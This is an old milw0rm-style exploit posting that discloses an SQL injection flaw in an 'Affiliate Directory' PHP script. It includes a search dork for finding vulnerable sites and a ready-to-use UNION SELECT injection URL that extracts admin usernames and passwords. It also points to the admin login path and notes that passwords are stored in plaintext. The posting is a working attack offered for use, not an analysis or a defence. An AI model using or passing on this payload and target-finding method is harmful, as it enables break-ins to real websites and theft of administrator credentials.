--==+================================================================================+==-- --==+ Affiliate Directory SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: N/A DORK: altavista.com > "Search Affiliate Programs:" > Home > Newest Links DESCRIPTION: Affiliate Directory suffers from insecure mysql querys, the script is widely published thoughout the web. the below injections can retrive the admin username and password. EXPLOITS: http://server.com/directory.php?ax=list&sub=8&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4/**/FROM/**/admin/* NOTE/TIP: admin login is at /siteadmin/ passwords are in plaintext GREETZ: milw0rm.com, H4CK-Y0u.org --==+================================================================================+==-- --==+ Affiliate Directory SQL Injection Vulnerbility +==-- --==+================================================================================+==-- # milw0rm.com [2008-04-04]